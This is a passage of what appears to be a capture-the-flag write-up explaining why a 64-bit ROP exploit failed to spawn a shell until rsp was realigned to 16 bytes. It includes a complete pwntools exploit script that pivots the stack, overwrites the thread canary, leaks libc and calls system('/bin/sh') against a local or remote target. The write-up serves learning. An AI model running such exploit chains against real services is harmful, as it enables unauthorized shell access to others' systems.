#include <stdio.h>
#include <pthread.h>
#include <asm/prctl.h>
#include <sys/prctl.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void * start(){
    getchar();
    system("/bin/sh");
    return 0;
}

int main()
{
    pthread_t t;
    pthread_create(&t, NULL, &start, 0);
    if (pthread_join(t, NULL) != 0) {
        puts("exit failure");
        return 1;
    }
    puts("Bye bye");
    return 0;
}

After a long stretch of debugging, I found something odd:

wired

Here syscall invokes the wait4() system call. If system were called normally, the program should block after the syscall executes; running the exploit, it did not block and fell straight through, meaning wait4() did not wait but returned immediately.

Puzzled, I checked the pid that wait4() was trying to wait on, i.e. the value of the rdi register:

pid_gg

As you can see, the process wait4() wants to wait on has already exited and become a zombie; with a normal call to system, the awaited process should look like this instead:

pid_not_gg

In other words, the /bin/sh invoked by system never started successfully. So I went back to the earlier assembly, looking for where /bin/sh gets launched.

I quickly found the relevant code:

start_system

You can see syscall here invokes clone; this is where /bin/sh gets spawned.

I then compared the two runs: in the normal run, execution through this assembly starts the child just fine, and the register arguments differ little from the exploit run, so by rights it should not fail to start.

At this point I was stuck. While pulling my hair out, I suddenly remembered an article I had read before: https://www.cnblogs.com/Rookle/p/12871878.html

And indeed, you can see that in the exploit run, rsp is not 16-byte aligned when execution reaches the syscall.

So, just to try it, I aligned rsp by hand:

alignment

Execute:

after_align

Now rax holds the returned pid; checking the process:

clone_successfuly

It started normally.

In other words, we must keep rsp 16-byte aligned before the syscall.

Fixing this in the exploit is simple: just add a ret gadget to the final payload, as sketched below.
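
Conceptually (a sketch; p64 is pwntools' packer, ret_gadget is the address of any bare ret, and whether the chain is misaligned is something you confirm in gdb by checking rsp % 16 at the syscall):

# Each 8-byte ROP slot flips rsp's 16-byte parity, so a bare 'ret'
# gadget is a one-slot no-op you can drop into the chain purely to
# fix alignment before system() reaches its syscall.
def fix_alignment(payload, ret_gadget, misaligned):
    if misaligned:
        payload += p64(ret_gadget)  # pops 8 bytes, does nothing else
    return payload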

The final version:

#!/usr/bin/python

from pwn import *

context.os = 'linux'
#context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'DEBUG'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666


def debug(command=''):
    gdb.attach(p, command)


def exploit():
    # debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')
    ret = 0x0000000000400287
    log.info("pop_rdi: " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave: " + hex(leave))

    size = 0x1850
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A' * 0x1010
    # stack pivot - step 1
    payload += p64(fakebuf)
    # ROP1 - leak libc
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot - step 2
    payload += p64(leave)
    # overwrite the TCB canary (stack_guard) and nothing past it
    payload = payload.ljust(size, 'A')
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.send(payload)
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.recvuntil('goodbye.\n')
    leak = p.recv(6) + '\x00\x00'
    leak = u64(leak)
    #info("libc.address is %#x", libc.address)
    #print("leak:", leak)
    #print("sym:", libc.symbols['puts'])
    libc.address = leak - libc.symbols['puts']

    #print("leak:",leak)
    #print("sym:",libc.symbols['puts'])
    info("libc.address is %#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']

    #payload = ''
    #payload += p64(0)
    #payload += p64((libc.address+0x4f3c2))
    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(ret)     # extra ret gadget: realigns rsp to 16 bytes
    payload += p64(system)

    p.send(payload)
    #print ("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.interactive()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path])  # , env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

Running it:

pwn

And we successfully get a shell.

As for the 16-byte rsp alignment requirement mentioned above, here is an excerpt on the subject from NASM:

The stack pointer %rsp must be aligned to a 16-byte boundary before making a call.
Fine, but the process of making a call pushes the return address (8 bytes) on the stack, so when a function gets control, %rsp is not aligned.
You have to make that extra space yourself, by pushing something or subtracting 8 from %rsp.

Linus also touched on this in a mailing-list thread:

On Tue, Jan 10, 2017 at 7:30 PM, Linus Torvalds
<torvalds@linux-foundation.org> wrote:
>
> If you really want more stack alignment, you have to generate that
> alignment yourself by hand (and have a bigger buffer that you do that
> alignment inside).

Side note: gcc can (and does) actually generate forced alignment using
"and" instructions on %rsp rather than assuming pre-existing
alignment. And that would be valid.

The problem with "alignof(16)" is not that gcc couldn't generate the
alignment itself, it's just the broken "it's already aligned to 16
bytes" assumption because -mpreferred-stack-boundary=3 doesn't work.

You *could* try to hack around it by forcing a 32-byte alignment
instead. That (I think) will make gcc generate the "and" instruction
mess.

And it shouldn't actually use any more memory than doing it by hand
(by having twice the alignment and hand-aligning the pointer).

So we *could* try to just have a really hacky rule saying that you can
align stack data to 8 or 32 bytes, but *not* to 16 bytes.

That said, I do think that the "don't assume stack alignment, do it by
hand" may be the safer thing. Because who knows what the random rules
will be on other architectures.

Linus
--

Since I haven't debugged the kernel here, for now I'll take the "call" in that rule to cover the syscall path as well: before a call, rsp must be kept aligned, or unpredictable errors may follow.

Conclusion

64-bit pwn still has plenty of points to watch out for. Later I'd like to debug the kernel further and see exactly where, after syscall 0x38 (clone), the misaligned rsp causes the abnormal exit (probably some movaps-like instruction, but that's just a guess).